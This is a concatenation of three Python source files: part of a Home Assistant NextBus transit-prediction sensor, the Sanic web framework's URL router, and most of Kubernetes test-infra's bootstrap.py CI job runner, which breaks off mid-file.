# Maybe pull a more user friendly name from the API here
self._name = f"{agency} {route}"
self._client = client
# set up default state attributes
self._state = None
self._attributes = {}
def _log_debug(self, message, *args):
"""Log debug message with prefix."""
_LOGGER.debug(":".join((self.agency, self.route, self.stop, message)), *args)
@property
def name(self):
"""Return sensor name.
Uses an auto generated name based on the data from the API unless a
custom name is provided in the configuration.
"""
if self._custom_name:
return self._custom_name
return self._name
@property
def device_class(self):
"""Return the device class."""
return DEVICE_CLASS_TIMESTAMP
@property
def state(self):
"""Return current state of the sensor."""
return self._state
@property
def device_state_attributes(self):
"""Return additional state attributes."""
return self._attributes
@property
def icon(self):
"""Return icon to be used for this sensor."""
# Would be nice if we could determine if the line is a train or bus
# however that doesn't seem to be available to us. Using bus for now.
return ICON
def update(self):
"""Update sensor with new departures times."""
# Note: using Multi because there is a bug with the single stop impl
results = self._client.get_predictions_for_multi_stops(
[{"stop_tag": self.stop, "route_tag": self.route}], self.agency
)
self._log_debug("Predictions results: %s", results)
if "Error" in results:
self._log_debug("Could not get predictions: %s", results)
if not results.get("predictions"):
self._log_debug("No predictions available")
self._state = None
# Remove attributes that may now be outdated
self._attributes.pop("upcoming", None)
return
results = results["predictions"]
# Set detailed attributes
self._attributes.update(
{
"agency": results.get("agencyTitle"),
"route": results.get("routeTitle"),
"stop": results.get("stopTitle"),
}
)
# List all messages in the attributes
messages = listify(results.get("message", []))
self._log_debug("Messages: %s", messages)
self._attributes["message"] = " -- ".join(
message.get("text", "") for message in messages
)
# List out all directions in the attributes
directions = listify(results.get("direction", []))
self._attributes["direction"] = ", ".join(
direction.get("title", "") for direction in directions
)
# Chain all predictions together
predictions = list(
chain(
*(listify(direction.get("prediction", [])) for direction in directions)
)
)
# Short circuit if we don't have any actual bus predictions
if not predictions:
self._log_debug("No upcoming predictions available")
self._state = None
self._attributes["upcoming"] = "No upcoming predictions"
return
# Generate list of upcoming times
self._attributes["upcoming"] = ", ".join(
sorted(p["minutes"] for p in predictions)
)
latest_prediction = maybe_first(predictions)
self._state = utc_from_timestamp(
int(latest_prediction["epochTime"]) / 1000
).isoformat()
|
|
import re
from collections import defaultdict, namedtuple
from collections.abc import Iterable
from functools import lru_cache
from sanic.exceptions import NotFound, InvalidUsage
from sanic.views import CompositionView
Route = namedtuple(
'Route',
['handler', 'methods', 'pattern', 'parameters', 'name'])
Parameter = namedtuple('Parameter', ['name', 'cast'])
REGEX_TYPES = {
'string': (str, r'[^/]+'),
'int': (int, r'\d+'),
'number': (float, r'[0-9\\.]+'),
'alpha': (str, r'[A-Za-z]+'),
}
ROUTER_CACHE_SIZE = 1024
def url_hash(url):
return url.count('/')
class RouteExists(Exception):
pass
class RouteDoesNotExist(Exception):
pass
class Router:
"""Router supports basic routing with parameters and method checks
Usage:
.. code-block:: python
@sanic.route('/my/url/<my_param>', methods=['GET', 'POST', ...])
def my_route(request, my_param):
do stuff...
or
.. code-block:: python
@sanic.route('/my/url/<my_param:my_type>', methods['GET', 'POST', ...])
def my_route_with_type(request, my_param: my_type):
do stuff...
Parameters will be passed as keyword arguments to the request handling
function. Provided parameters can also have a type by appending :type to
the <parameter>. Given parameter must be able to be type-casted to this.
If no type is provided, a string is expected. A regular expression can
also be passed in as the type. The argument given to the function will
always be a string, independent of the type.
"""
routes_static = None
routes_dynamic = None
routes_always_check = None
parameter_pattern = re.compile(r'<(.+?)>')
def __init__(self):
self.routes_all = {}
self.routes_static = {}
self.routes_dynamic = defaultdict(list)
self.routes_always_check = []
self.hosts = set()
def parse_parameter_string(self, parameter_string):
"""Parse a parameter string into its constituent name, type, and
pattern
For example::
parse_parameter_string('<param_one:[A-z]>')` ->
('param_one', str, '[A-z]')
:param parameter_string: String to parse
:return: tuple containing
(parameter_name, parameter_type, parameter_pattern)
"""
# We could receive NAME or NAME:PATTERN
name = parameter_string
pattern = 'string'
if ':' in parameter_string:
name, pattern = parameter_string.split(':', 1)
default = (str, pattern)
# Pull from pre-configured types
_type, pattern = REGEX_TYPES.get(pattern, default)
return name, _type, pattern
def add(self, uri, methods, handler, host=None, strict_slashes=False):
# add regular version
self._add(uri, methods, handler, host)
if strict_slashes:
return
# Add versions with and without trailing /
slash_is_missing = (
not uri[-1] == '/'
and not self.routes_all.get(uri + '/', False)
)
without_slash_is_missing = (
uri[-1] == '/'
and not self.routes_all.get(uri[:-1], False)
and not uri == '/'
)
# add version with trailing slash
if slash_is_missing:
self._add(uri + '/', methods, handler, host)
# add version without trailing slash
elif without_slash_is_missing:
self._add(uri[:-1], methods, handler, host)
def _add(self, uri, methods, handler, host=None):
"""Add a handler to the route list
:param uri: path to match
:param methods: sequence of accepted method names. If none are
provided, any method is allowed
:param handler: request handler function.
When executed, it should provide a response object.
:return: Nothing
"""
if host is not None:
if isinstance(host, str):
uri = host + uri
self.hosts.add(host)
else:
if not isinstance(host, Iterable):
raise ValueError("Expected either string or Iterable of "
"host strings, not {!r}".format(host))
for host_ in host:
self.add(uri, methods, handler, host_)
return
# Dict for faster lookups of if method allowed
if methods:
methods = frozenset(methods)
parameters = []
properties = {"unhashable": None}
def add_parameter(match):
name = match.group(1)
name, _type, pattern = self.parse_parameter_string(name)
parameter = Parameter(
name=name, cast=_type)
parameters.append(parameter)
# Mark the whole route as unhashable if it has the hash key in it
if re.search('(^|[^^]){1}/', pattern):
properties['unhashable'] = True
# Mark the route as unhashable if it matches the hash key
elif re.search(pattern, '/'):
properties['unhashable'] = True
return '({})'.format(pattern)
pattern_string = re.sub(self.parameter_pattern, add_parameter, uri)
pattern = re.compile(r'^{}$'.format(pattern_string))
def merge_route(route, methods, handler):
# merge to the existing route when possible.
if not route.methods or not methods:
# method-unspecified routes are not mergeable.
raise RouteExists(
"Route already registered: {}".format(uri))
elif route.methods.intersection(methods):
# already existing method is not overloadable.
duplicated = methods.intersection(route.methods)
raise RouteExists(
"Route already registered: {} [{}]".format(
uri, ','.join(list(duplicated))))
if isinstance(route.handler, CompositionView):
view = route.handler
else:
view = CompositionView()
view.add(route.methods, route.handler)
view.add(methods, handler)
route = route._replace(
handler=view, methods=methods.union(route.methods))
return route
if parameters:
# TODO: This is too complex, we need to reduce the complexity
if properties['unhashable']:
routes_to_check = self.routes_always_check
ndx, route = self.check_dynamic_route_exists(
pattern, routes_to_check)
else:
routes_to_check = self.routes_dynamic[url_hash(uri)]
ndx, route = self.check_dynamic_route_exists(
pattern, routes_to_check)
if ndx != -1:
# Pop the ndx of the route, no dups of the same route
routes_to_check.pop(ndx)
else:
route = self.routes_all.get(uri)
if route:
route = merge_route(route, methods, handler)
else:
# prefix the handler name with the blueprint name
# if available
if hasattr(handler, '__blueprintname__'):
handler_name = '{}.{}'.format(
handler.__blueprintname__, handler.__name__)
else:
handler_name = getattr(handler, '__name__', None)
route = Route(
handler=handler, methods=methods, pattern=pattern,
parameters=parameters, name=handler_name)
self.routes_all[uri] = route
if properties['unhashable']:
self.routes_always_check.append(route)
elif parameters:
self.routes_dynamic[url_hash(uri)].append(route)
else:
self.routes_static[uri] = route
@staticmethod
def check_dynamic_route_exists(pattern, routes_to_check):
for ndx, route in enumerate(routes_to_check):
if route.pattern == pattern:
return ndx, route
else:
return -1, None
def remove(self, uri, clean_cache=True, host=None):
if host is not None:
uri = host + uri
try:
route = self.routes_all.pop(uri)
except KeyError:
raise RouteDoesNotExist("Route was not registered: {}".format(uri))
if route in self.routes_always_check:
self.routes_always_check.remove(route)
elif url_hash(uri) in self.routes_dynamic \
and route in self.routes_dynamic[url_hash(uri)]:
self.routes_dynamic[url_hash(uri)].remove(route)
else:
self.routes_static.pop(uri)
if clean_cache:
self._get.cache_clear()
@lru_cache(maxsize=ROUTER_CACHE_SIZE)
def find_route_by_view_name(self, view_name):
"""Find a route in the router based on the specified view name.
:param view_name: string of view name to search by
:return: tuple containing (uri, Route)
"""
if not view_name:
return (None, None)
for uri, route in self.routes_all.items():
if route.name == view_name:
return uri, route
return (None, None)
def get(self, request):
"""Get a request handler based on the URL of the request, or raises an
error
:param request: Request object
:return: handler, arguments, keyword arguments
"""
# No virtual hosts specified; default behavior
if not self.hosts:
return self._get(request.path, request.method, '')
# virtual hosts specified; try to match route to the host header
try:
return self._get(request.path, request.method,
request.headers.get("Host", ''))
# try default hosts
except NotFound:
return self._get(request.path, request.method, '')
@lru_cache(maxsize=ROUTER_CACHE_SIZE)
def _get(self, url, method, host):
"""Get a request handler based on the URL of the request, or raises an
error. Internal method for caching.
:param url: request URL
:param method: request method
:return: handler, arguments, keyword arguments
"""
url = host + url
# Check against known static routes
route = self.routes_static.get(url)
method_not_supported = InvalidUsage(
'Method {} not allowed for URL {}'.format(
method, url), status_code=405)
if route:
if route.methods and method not in route.methods:
raise method_not_supported
match = route.pattern.match(url)
else:
route_found = False
# Move on to testing all regex routes
for route in self.routes_dynamic[url_hash(url)]:
match = route.pattern.match(url)
route_found |= match is not None
# Do early method checking
if match and method in route.methods:
break
else:
# Lastly, check against all regex routes that cannot be hashed
for route in self.routes_always_check:
match = route.pattern.match(url)
route_found |= match is not None
# Do early method checking
if match and method in route.methods:
break
else:
# Route was found but the methods didn't match
if route_found:
raise method_not_supported
raise NotFound('Requested URL {} not found'.format(url))
kwargs = {p.name: p.cast(value)
for value, p
in zip(match.groups(1), route.parameters)}
route_handler = route.handler
if hasattr(route_handler, 'handlers'):
route_handler = route_handler.handlers[method]
return route_handler, [], kwargs
|
|
#!/usr/bin/env python
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Need to figure out why this only fails on travis
# pylint: disable=bad-continuation
"""Bootstraps starting a test job.
The following should already be done:
git checkout http://k8s.io/test-infra
cd $WORKSPACE
test-infra/jenkins/bootstrap.py <--repo=R || --bare> <--job=J> <--pull=P || --branch=B>
The bootstrapper now does the following:
# Note start time
# read test-infra/jenkins/$JOB.json
# check out repoes defined in $JOB.json
# note job started
# call runner defined in $JOB.json
# upload artifacts (this will change later)
# upload build-log.txt
# note job ended
The contract with the runner is as follows:
* Runner must exit non-zero if job fails for any reason.
"""
import argparse
import contextlib
import json
import logging
import os
import pipes
import random
import re
import select
import signal
import socket
import subprocess
import sys
import tempfile
import time
ORIG_CWD = os.getcwd() # Checkout changes cwd
def read_all(end, stream, append):
"""Read all buffered lines from a stream."""
while not end or time.time() < end:
line = stream.readline()
if not line:
return True # Read everything
# Strip \n at the end if any. Last line of file may not have one.
append(line.rstrip('\n'))
# Is there more on the buffer?
ret = select.select([stream.fileno()], [], [], 0.1)
if not ret[0]:
return False # Cleared buffer but not at the end
return False # Time expired
def elapsed(since):
"""Return the number of minutes elapsed since a time."""
return (time.time() - since) / 60
def terminate(end, proc, kill):
"""Terminate or kill the process after end."""
if not end or time.time() <= end:
return False
if kill: # Process will not die, kill everything
pgid = os.getpgid(proc.pid)
logging.info(
'Kill %d and process group %d', proc.pid, pgid)
os.killpg(pgid, signal.SIGKILL)
proc.kill()
return True
logging.info(
'Terminate %d on timeout', proc.pid)
proc.terminate()
return True
def _call(end, cmd, stdin=None, check=True, output=None):
"""Start a subprocess."""
logging.info('Call: %s', ' '.join(pipes.quote(c) for c in cmd))
begin = time.time()
if end:
end = max(end, time.time() + 60) # Allow at least 60s per command
proc = subprocess.Popen(
cmd,
stdin=subprocess.PIPE if stdin is not None else None,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=os.setsid,
)
if stdin:
proc.stdin.write(stdin)
proc.stdin.close()
out = []
code = None
timeout = False
reads = {
proc.stderr.fileno(): (proc.stderr, logging.warning),
proc.stdout.fileno(): (
proc.stdout, (out.append if output else logging.info)),
}
while reads:
if terminate(end, proc, timeout):
if timeout: # We killed everything
break
# Give subprocess some cleanup time before killing.
end = time.time() + 15 * 60
timeout = True
ret = select.select(reads, [], [], 0.1)
for fdesc in ret[0]:
if read_all(end, *reads[fdesc]):
reads.pop(fdesc)
if not ret[0] and proc.poll() is not None:
break # process exited without closing pipes (timeout?)
code = proc.wait()
if timeout:
code = code or 124
logging.error('Build timed out')
if code:
logging.error('Build failed')
logging.info(
'process %d exited with code %d after %.1fm',
proc.pid, code, elapsed(begin))
out.append('')
lines = output and '\n'.join(out)
if check and code:
raise subprocess.CalledProcessError(code, cmd, lines)
return lines
def ref_has_shas(ref):
"""Determine if a reference specifies shas (contains ':')"""
return isinstance(ref, basestring) and ':' in ref
def pull_numbers(pull):
"""Turn a pull reference list into a list of PR numbers to merge."""
if ref_has_shas(pull):
return [r.split(':')[0] for r in pull.split(',')][1:]
else:
return [str(pull)]
def pull_ref(pull):
"""Turn a PR number of list of refs into specific refs to fetch and check out."""
if isinstance(pull, int) or ',' not in pull:
return ['+refs/pull/%d/merge' % int(pull)], ['FETCH_HEAD']
pulls = pull.split(',')
refs = []
checkouts = []
for ref in pulls:
if ':' in ref: # master:abcd or 1234:abcd
name, sha = ref.split(':')
elif not refs: # master
name, sha = ref, 'FETCH_HEAD'
else:
name = ref
sha = 'refs/pr/%s' % ref
checkouts.append(sha)
if not refs: # First ref should be branch to merge into
refs.append(name)
else: # Subsequent refs should be PR numbers
num = int(name)
refs.append('+refs/pull/%d/head:refs/pr/%d' % (num, num))
return refs, checkouts
def branch_ref(branch):
"""Split branch:sha if necessary."""
if ref_has_shas(branch):
split_refs = branch.split(':')
return [split_refs[0]], [split_refs[1]]
else:
return [branch], ['FETCH_HEAD']
def repository(repo, ssh):
"""Return the url associated with the repo."""
if repo.startswith('k8s.io/'):
repo = 'github.com/kubernetes/%s' % (repo[len('k8s.io/'):])
if ssh:
if ":" not in repo:
parts = repo.split('/', 1)
repo = '%s:%s' % (parts[0], parts[1])
return 'git@%s' % repo
return 'https://%s' % repo
def random_sleep(attempt):
"""Sleep 2**attempt seconds with a random fractional offset."""
time.sleep(random.random() + attempt ** 2)
def checkout(call, repo, branch, pull, ssh='', git_cache='', clean=False):
"""Fetch and checkout the repository at the specified branch/pull."""
# pylint: disable=too-many-locals
if bool(branch) == bool(pull):
raise ValueError('Must specify one of --branch or --pull')
if pull:
refs, checkouts = pull_ref(pull)
else:
refs, checkouts = branch_ref(branch)
git = 'git'
if git_cache:
cache_dir = '%s/%s' % (git_cache, repo)
try:
os.makedirs(cache_dir)
except OSError:
pass
call([git, 'init', repo, '--separate-git-dir=%s' % cache_dir])
call(['rm', '-f', '%s/index.lock' % cache_dir])
else:
call([git, 'init', repo])
os.chdir(repo)
if clean:
call([git, 'clean', '-dfx'])
call([git, 'reset', '--hard'])
# To make a merge commit, a user needs to be set. It's okay to use a dummy
# user here, since we're not exporting the history.
call([git, 'config', '--local', 'user.name', 'K8S Bootstrap'])
call([git, 'config', '--local', 'user.email', 'k8s_bootstrap@localhost'])
retries = 3
for attempt in range(retries):
try:
call([git, 'fetch', '--quiet', '--tags', repository(repo, ssh)] + refs)
break
except subprocess.CalledProcessError as cpe:
if attempt >= retries - 1:
raise
if cpe.returncode != 128:
raise
logging.warning('git fetch failed')
random_sleep(attempt)
call([git, 'checkout', '-B', 'test', checkouts[0]])
for ref, head in zip(refs, checkouts)[1:]:
call(['git', 'merge', '--no-ff', '-m', 'Merge %s' % ref, head])
def repos_dict(repos):
"""Returns {"repo1": "branch", "repo2": "pull"}."""
return {r: b or p for (r, (b, p)) in repos.items()}
def start(gsutil, paths, stamp, node_name, version, repos):
"""Construct and upload started.json."""
data = {
'timestamp': int(stamp),
'jenkins-node': node_name,
'node': node_name,
}
if version:
data['repo-version'] = version
data['version'] = version # TODO(fejta): retire
if repos:
pull = repos[repos.main]
if ref_has_shas(pull[1]):
data['pull'] = pull[1]
data['repos'] = repos_dict(repos)
gsutil.upload_json(paths.started, data)
# Upload a link to the build path in the directory
if paths.pr_build_link:
gsutil.upload_text(paths.pr_build_link, paths.pr_path)
class GSUtil(object):
"""A helper class for making gsutil commands."""
gsutil = 'gsutil'
def __init__(self, call):
self.call = call
def stat(self, path):
"""Return metadata about the object, such as generation."""
cmd = [self.gsutil, 'stat', path]
return self.call(cmd, output=True)
def upload_json(self, path, jdict, generation=None):
"""Upload the dictionary object to path."""
if generation is not None: # generation==0 means object does not exist
gen = ['-h', 'x-goog-if-generation-match:%s' % generation]
else:
gen = []
cmd = [
self.gsutil, '-q',
'-h', 'Content-Type:application/json'] + gen + [
'cp', '-', path]
self.call(cmd, stdin=json.dumps(jdict, indent=2))
def copy_file(self, dest, orig):
"""Copy the file to the specified path using compressed encoding."""
cmd = [self.gsutil, '-q', 'cp', '-Z', orig, dest]
self.call(cmd)
def upload_text(self, path, txt, cached=True):
"""Copy the text to path, optionally disabling caching."""
headers = ['-h', 'Content-Type:text/plain']
if not cached:
headers += ['-h', 'Cache-Control:private, max-age=0, no-transform']
cmd = [self.gsutil, '-q'] + headers + ['cp', '-', path]
self.call(cmd, stdin=txt)
def cat(self, path, generation):
"""Return contents of path#generation"""
cmd = [self.gsutil, '-q', 'cat', '%s#%s' % (path, generation)]
return self.call(cmd, output=True)
def upload_artifacts(self, path, artifacts):
"""Upload artifacts to the specified path."""
# Upload artifacts
if os.path.isdir(artifacts):
cmd = [
self.gsutil, '-m', '-q',
'-o', 'GSUtil:use_magicfile=True',
'cp', '-r', '-c', '-z', 'log,txt,xml',
artifacts, path,
]
self.call(cmd)
def append_result(gsutil, path, build, version, passed):
"""Download a json list and append metadata about this build to it."""
# TODO(fejta): delete the clone of this logic in upload-to-gcs.sh
# (this is update_job_result_cache)
end = time.time() + 300 # try for up to five minutes
errors = 0
while time.time() < end:
if errors:
random_sleep(min(errors, 3))
try:
out = gsutil.stat(path)
gen = re.search(r'Generation:\s+(\d+)', out).group(1)
except subprocess.CalledProcessError:
gen = 0
if gen:
try:
cache = json.loads(gsutil.cat(path, gen))
if not isinstance(cache, list):
raise ValueError(cache)
except ValueError as exc:
logging.warning('Failed to decode JSON: %s', exc)
cache = []
except subprocess.CalledProcessError: # gen doesn't exist
errors += 1
continue
else:
cache = []
cache.append({
'version': version, # TODO(fejta): retire
'job-version': version,
'buildnumber': build,
'passed': bool(passed),
'result': 'SUCCESS' if passed else 'FAILURE',
})
cache = cache[-300:]
try:
gsutil.upload_json(path, cache, generation=gen)
return
except subprocess.CalledProcessError:
logging.warning('Failed to append to %s#%s', path, gen)
errors += 1
def metadata(repos, artifacts, call):
"""Return metadata associated for the build, including inside artifacts."""
path = os.path.join(artifacts or '', 'metadata.json')
meta = None
if os.path.isfile(path):
try:
with open(path) as fp:
meta = json.loads(fp.read())
except (IOError, ValueError):
pass
if not meta or not isinstance(meta, dict):
meta = {}
if repos:
meta['repo'] = repos.main
meta['repos'] = repos_dict(repos)
try:
commit = call(['git', 'rev-parse', 'HEAD'], output=True)
if commit:
meta['repo-commit'] = commit.strip()
except subprocess.CalledProcessError:
pass
return meta
def finish(gsutil, paths, success, artifacts, build, version, repos, call):
"""
Args:
paths: a Paths instance.
success: the build passed if true.
artifacts: a dir containing artifacts to upload.
build: identifier of this build.
version: identifies what version of the code the build tested.
repo: the target repo
"""
if os.path.isdir(artifacts) and any(f for _, _, f in os.walk(artifacts)):
try:
gsutil.upload_artifacts(paths.artifacts, artifacts)
except subprocess.CalledProcessError:
logging.warning('Failed to upload artifacts')
meta = metadata(repos, artifacts, call)
if not version:
version = meta.get('job-version')
if not version: # TODO(fejta): retire
version = meta.get('version')
# github.com/kubernetes/release/find_green_build depends on append_result()
# TODO(fejta): reconsider whether this is how we want to solve this problem.
append_result(gsutil, paths.result_cache, build, version, success)
if paths.pr_result_cache:
append_result(gsutil, paths.pr_result_cache, build, version, success)
data = {
# TODO(fejta): update utils.go in contrib to accept a float
'timestamp': int(time.time()),
'result': 'SUCCESS' if success else 'FAILURE',
'passed': bool(success),
'metadata': meta,
}
if version:
data['job-version'] = version
data['version'] = version # TODO(fejta): retire
gsutil.upload_json(paths.finished, data)
# Upload the latest build for the job.
# Do this last, since other tools expect the rest of the data to be
# published when this file is created.
for path in {paths.latest, paths.pr_latest}:
if path:
try:
gsutil.upload_text(path, str(build), cached=False)
except subprocess.CalledProcessError:
logging.warning('Failed to update %s', path)
def test_infra(*paths):
"""Return path relative to root of test-infra repo."""
return os.path.join(ORIG_CWD, os.path.dirname(__file__), '..', *paths)
def node():
"""Return the name of the node running the build."""
# TODO(fejta): jenkins sets the node name and our infra expect this value.
# TODO(fejta): Consider doing something different here.
if NODE_ENV not in os.environ:
os.environ[NODE_ENV] = ''.join(socket.gethostname().split('.')[:1])
return os.environ[NODE_ENV]
def find_version(call):
"""Determine and return the version of the build."""
# TODO(fejta): once job-version is functional switch this to
# git rev-parse [--short=N] HEAD^{commit}
version_file = 'version'
if os.path.isfile(version_file):
# e2e tests which download kubernetes use this path:
with open(version_file) as fp:
return fp.read().strip()
version_script = 'hack/lib/version.sh'
if os.path.isfile(version_script):
cmd = [
'bash', '-c', (
"""
set -o errexit
set -o nounset
export KUBE_ROOT=.
source %s
kube::version::get_version_vars
echo $KUBE_GIT_VERSION
""" % version_script)
]
return call(cmd, output=True).strip()
return 'unknown'
class Paths(object): # pylint: disable=too-many-instance-attributes,too-few-public-methods
"""Links to remote gcs-paths for uploading results."""
def __init__( # pylint: disable=too-many-arguments
self,
artifacts, # artifacts folder (in build)
build_log, # build-log.txt (in build)
pr_path, # path to build
finished, # finished.json (metadata from end of build)
latest, # latest-build.txt (in job)
pr_build_link, # file containng pr_path (in job directory)
pr_latest, # latest-build.txt (in pr job)
pr_result_cache, # jobResultsCache.json (in pr job)
result_cache, # jobResultsCache.json (cache of latest results in job)
started, # started.json (metadata from start of build)
):
self.artifacts = artifacts
self.build_log = build_log
self.pr_path = pr_path
self.finished = finished
self.latest = latest
self.pr_build_link = pr_build_link
self.pr_latest = pr_latest
self.pr_result_cache = pr_result_cache
self.result_cache = result_cache
self.started = started
def ci_paths(base, job, build):
"""Return a Paths() instance for a continuous build."""
latest = os.path.join(base, job, 'latest-build.txt')
return Paths(
artifacts=os.path.join(base, job, build, 'artifacts'),
build_log=os.path.join(base, job, build, 'build-log.txt'),
pr_path=None,
finished=os.path.join(base, job, build, 'finished.json'),
latest=latest,
pr_build_link=None,
pr_latest=None,
pr_result_cache=None,
result_cache=os.path.join(base, job, 'jobResultsCache.json'),
started=os.path.join(base, job, build, 'started.json'),
)
def pr_paths(base, repos, job, build):
"""Return a Paths() instance for a PR."""
if not repos:
raise ValueError('repos is empty')
repo = repos.main
pull = str(repos[repo][1])
if repo in ['k8s.io/kubernetes', 'kubernetes/kubernetes']:
prefix = ''
elif repo.startswith('k8s.io/'):
prefix = repo[len('k8s.io/'):]
elif repo.startswith('kubernetes/'):
prefix = repo[len('kubernetes/'):]
elif repo.startswith('github.com/'):
prefix = repo[len('github.com/'):].replace('/', '_')
else:
prefix = repo.replace('/', '_')
# Batch merges are those with more than one PR specified.
pr_nums = pull_numbers(pull)
if len(pr_nums) > 1:
pull = os.path.join(prefix, 'batch')
else:
pull = os.path.join(prefix, pr_nums[0])
pr_path = os.path.join(base, 'pull', pull, job, build)
result_cache = os.path.join(
base, 'directory', job, 'jobResultsCache.json')
pr_result_cache = os.path.join(
base, 'pull', pull, job, 'jobResultsCache.json')
return Paths(
artifacts=os.path.join(pr_path, 'artifacts'),
build_log=os.path.join(pr_path, 'build-log.txt'),
pr_path=pr_path,
finished=os.path.join(pr_path, 'finished.json'),
latest=os.path.join(base, 'directory', job, 'latest-build.txt'),
pr_build_link=os.path.join(base, 'directory', job, '%s.txt' % build),
pr_latest=os.path.join(base, 'pull', pull, job, 'latest-build.txt'),
pr_result_cache=pr_result_cache,
result_cache=result_cache,
started=os.path.join(pr_path, 'started.json'),
)
BUILD_ENV = 'BUILD_NUMBER'
BOOTSTRAP_ENV = 'BOOTSTRAP_MIGRATION'
CLOUDSDK_ENV = 'CLOUDSDK_CONFIG'
GCE_KEY_ENV = 'JENKINS_GCE_SSH_PRIVATE_KEY_FILE'
GUBERNATOR = 'https://k8s-gubernator.appspot.com/build'
HOME_ENV = 'HOME'
JOB_ENV = 'JOB_NAME'
NODE_ENV = 'NODE_NAME'
SERVICE_ACCOUNT_ENV = 'GOOGLE_APPLICATION_CREDENTIALS'
WORKSPACE_ENV = 'WORKSPACE'
def build_name(started):
"""Return the unique(ish) string representing this build."""
# TODO(fejta): right now jenkins sets the BUILD_NUMBER and does this
# in an environment variable. Consider migrating this to a
# bootstrap.py flag
if BUILD_ENV not in os.environ:
# Automatically generate a build number if none is set
uniq = '%x-%d' % (hash(node()), os.getpid())
autogen = time.strftime('%Y%m%d-%H%M%S-' + uniq, time.gmtime(started))
os.environ[BUILD_ENV] = autogen
return os.environ[BUILD_ENV]
def setup_credentials(call, robot, upload):
"""Activate the service account unless robot is none."""
# TODO(fejta): stop activating inside the image
# TODO(fejta): allow use of existing gcloud auth
if robot:
os.environ[SERVICE_ACCOUNT_ENV] = robot
if not os.getenv(SERVICE_ACCOUNT_ENV) and upload:
logging.warning('Cannot --upload=%s, no active gcloud account.', upload)
raise ValueError('--upload requires --service-account')
if not os.getenv(SERVICE_ACCOUNT_ENV) and not upload:
logging.info('Will not upload results.')
return
if not os.path.isfile(os.environ[SERVICE_ACCOUNT_ENV]):
raise IOError(
'Cannot find service account credentials',
os.environ[SERVICE_ACCOUNT_ENV],
'Create service account and then create key at '
'https://console.developers.google.com/iam-admin/serviceaccounts/project', # pylint: disable=line-too-long
)
call([
'gcloud',
'auth',
'activate-service-account',
'--key-file=%s' % os.environ[SERVICE_ACCOUNT_ENV],
])
try: # Old versions of gcloud may not support this value
account = call(
['gcloud', 'config', 'get-value', 'account'], output=True).strip()
except subprocess.CalledProcessError:
account = 'unknown'
logging.info('Will upload results to %s using %s', upload, account)
def setup_logging(path):
"""Initialize logging to screen and path."""
# See https://docs.python.org/2/library/logging.html#logrecord-attributes
# [IWEF]mmdd HH:MM:SS.mmm] msg
fmt = '%(levelname).1s%(asctime)s.%(msecs)03d] %(message)s' # pylint: disable=line-too-long
datefmt = '%m%d %H:%M:%S'
logging.basicConfig(
level=logging.INFO,
format=fmt,
datefmt=datefmt,
)
build_log = logging.FileHandler(filename=path, mode='w')
build_log.setLevel(logging.INFO)
formatter = logging.Formatter(fmt, datefmt=datefmt)
build_log.setFormatter(formatter)
logging.getLogger('').addHandler(build_log)
return build_log
def setup_magic_environment(job):
"""Set magic environment variables scripts currently expect."""
home = os.environ[HOME_ENV]
# TODO(fejta): jenkins sets these values. Consider migrating to using
# a secret volume instead and passing the path to this volume
# into bootstrap.py as a flag.
os.environ.setdefault(
GCE_KEY_ENV,
os.path.join(home, '.ssh/google_compute_engine'),
)
os.environ.setdefault(
'JENKINS_GCE_SSH_PUBLIC_KEY_FILE',
os.path.join(home, '.ssh/google_compute_engine.pub'),
)
os.environ.setdefault(
'JENKINS_AWS_SSH_PRIVATE_KEY_FILE',
os.path.join(home, '.ssh/kube_aws_rsa'),
)
os.environ.setdefault(
'JENKINS_AWS_SSH_PUBLIC_KEY_FILE',
os.path.join(home, '.ssh/kube_aws_rsa.pub'),
)
cwd = os.getcwd()
# TODO(fejta): jenkins sets WORKSPACE and pieces of our infra expect this
# value. Consider doing something else in the future.
os.environ[WORKSPACE_ENV] = cwd
# TODO(fejta): jenkins/dockerized-e2e-runner.sh also sets HOME to WORKSPACE,
# probably to minimize leakage between jobs.
# Consider accomplishing this another way.
os.environ[HOME_ENV] = cwd
# TODO(fejta): jenkins sets JOB_ENV and pieces of our infra expect this
# value. Consider making everything below here agnostic to the
# job name.
if JOB_ENV not in os.environ:
os.environ[JOB_ENV] = job
elif os.environ[JOB_ENV] != job:
logging.warning('%s=%s (overrides %s)', JOB_ENV, job, os.environ[JOB_ENV])
os.environ[JOB_ENV] = job
# TODO(fejta): Magic value to tell our test code not do upload started.json
# TODO(fejta): delete upload-to-gcs.sh and then this value.
os.environ[BOOTSTRAP_ENV] = 'yes'
# This helps prevent reuse of cloudsdk configuration. It also reduces the
# risk that running a job on a workstation corrupts the user's config.
os.environ[CLOUDSDK_ENV] = '%s/.config/gcloud' % cwd
def job_args(args):
"""Converts 'a ${FOO} $bar' into 'a wildly different string'."""
return [os.path.expandvars(a) for a in args]
def job_script(job, use_json):
"""Return path to script for job."""
if not use_json:
return [test_infra('jobs/%s.sh' % job)]
with open(test_infra('jobs/config.json')) as fp:
config = json.loads(fp.read())
job_config = config[job]
cmd = test_infra('scenarios/%s.py' % job_config['scenario'])
return [cmd] + job_args(job_config.get('args', []))
def gubernator_uri(paths):
"""Return a gubernator link for this build."""
job = os.path.dirname(paths.build_log)
if job.startswith('gs:/'):
return job.replace('gs:/', GUBERNATOR, 1)
return job
@contextlib.contextmanager
def choose_ssh_key(ssh):
"""Creates a script for GIT_SSH that uses -i ssh if set."""
if not ssh: # Nothing to do
yield
return
# Create a script for use with GIT_SSH, which defines the program git uses
# during git fetch. In the future change this to GIT_SSH_COMMAND
# https://superuser.com/questions/232373/how-to-tell-git-which-private-key-to-use
with tempfile.NamedTemporaryFile(prefix='ssh', delete=False) as fp:
fp.write('#!/bin/sh\nssh -o StrictHostKeyChecking=no -i \'%s\' -F /dev/null "${@}"\n' % ssh)
try:
os.chmod(fp.name, 0500)
had = 'GIT_SSH' in os.environ
old = os.getenv('GIT_SSH')
os.environ['GIT_SSH'] = fp.name
yield
del os.environ['GIT_SSH']
if had:
os.environ['GIT_SSH'] = old
finally:
os.unlink(fp.name)
def setup_root(call, root, repos, ssh, git_cache, clean):
"""Create root dir, checkout repo and cd into resulting dir."""
